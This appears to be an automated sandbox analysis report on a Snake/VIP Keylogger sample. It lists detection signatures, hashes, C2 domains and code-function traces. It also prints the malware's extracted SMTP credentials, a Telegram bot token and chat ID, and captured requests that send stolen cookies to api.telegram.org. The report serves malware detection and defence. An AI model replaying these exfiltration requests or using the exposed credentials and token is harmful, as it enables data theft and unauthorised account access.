Windows Analysis Report
DSD876543456780000.exe

Overview

General Information

Sample name: DSD876543456780000.exe
Analysis ID: 1481105
MD5: f202040eb9d89916f413e67d59c7fd7f
SHA1: 84ce5b7ca29eb6e4a5290d21c4948d505c23a04a
SHA256: 59337107a058bfd8eb4b8bc0506208d1eab639b6fbd92aefb156e7b21a1d3695
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://aborters.duckdns.org:8081 Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081 Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}
Source: 3.2.svchost.exe.7730000.2.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI", "Chat id": "6443825857"}
Source: svchost.exe.6024.6.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendMessage"}
Multi AV Scanner detection for domain / URL
Source: http://varders.kozow.com:8081 Virustotal: Detection: 14% Perma Link
Source: http://aborters.duckdns.org:8081 Virustotal: Detection: 11% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe ReversingLabs: Detection: 37%
Multi AV Scanner detection for submitted file
Source: DSD876543456780000.exe ReversingLabs: Detection: 37%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: DSD876543456780000.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: DSD876543456780000.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49733 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49737 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: Binary string: _.pdb source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: chordates.exe, 00000002.00000003.2038779865.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000002.00000003.2038113253.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2178237621.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2176735582.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: chordates.exe, 00000002.00000003.2038779865.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000002.00000003.2038113253.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2178237621.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2176735582.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C5DBBE
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C2C2A2 FindFirstFileExW, 0_2_00C2C2A2
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C668EE FindFirstFileW,FindClose, 0_2_00C668EE
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00C6698F
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C5D076
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C5D3A9
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C69642
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C6979D
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00C69B2B
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C65C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00C65C97
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ECDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 2_2_00ECDBBE
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E9C2A2 FindFirstFileExW, 2_2_00E9C2A2
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED68EE FindFirstFileW,FindClose, 2_2_00ED68EE
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 2_2_00ED698F
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ECD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_00ECD076
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ECD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_00ECD3A9
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00ED9642
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00ED979D
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 2_2_00ED9B2B
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED5C97 FindFirstFileW,FindNextFileW,FindClose, 2_2_00ED5C97
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080ACF7Ch 3_2_080ACCD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_080A0040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080AFAECh 3_2_080AF840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_080A0856
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080AD3D4h 3_2_080AD128
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080A3206h 3_2_080A3134
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080A2834h 3_2_080A2580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080AD82Ch 3_2_080AD580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080A3206h 3_2_080A2DDA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080ADC84h 3_2_080AD9D8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080A3206h 3_2_080A2DE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080AE0DCh 3_2_080ADE30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_080A0676
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080AE534h 3_2_080AE288
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080AE98Ch 3_2_080AE6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080AEDE4h 3_2_080AEB38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080A0D10h 3_2_080A0B30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080A169Ah 3_2_080A0B30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080AF23Ch 3_2_080AEF90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 080AF694h 3_2_080AF3E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092A2834h 6_2_092A2580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092A3206h 6_2_092A2DE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092ADC84h 6_2_092AD9D8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092A0D10h 6_2_092A0B30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092A169Ah 6_2_092A0B30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092AD3D4h 6_2_092AD128
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092A3206h 6_2_092A3134
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092AD82Ch 6_2_092AD580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092A3206h 6_2_092A2DE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092A3206h 6_2_092A31C9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 6_2_092A0040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092AFAECh 6_2_092AF840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 6_2_092A0856
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092ACF7Ch 6_2_092ACCD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092AEDE4h 6_2_092AEB38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092AF23Ch 6_2_092AEF90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092AF694h 6_2_092AF3E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092AE0DCh 6_2_092ADE30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 6_2_092A0676
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092AE534h 6_2_092AE288
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then jmp 092AE98Ch 6_2_092AE6E0

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 118.69.190.131 587 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 158.101.44.242 80 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 149.154.167.220 443 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 188.114.97.3 443 Jump to behavior
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49734 -> 118.69.190.131:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcad0e9d9f0038Host: api.telegram.orgContent-Length: 1257Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcae9abfa21153Host: api.telegram.orgContent-Length: 1257Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: FPT-AS-APTheCorporationforFinancingPromotingTechnolo FPT-AS-APTheCorporationforFinancingPromotingTechnolo
Source: Joe Sandbox View ASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.5:49734 -> 118.69.190.131:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49733 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49737 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C6CE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 0_2_00C6CE44
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
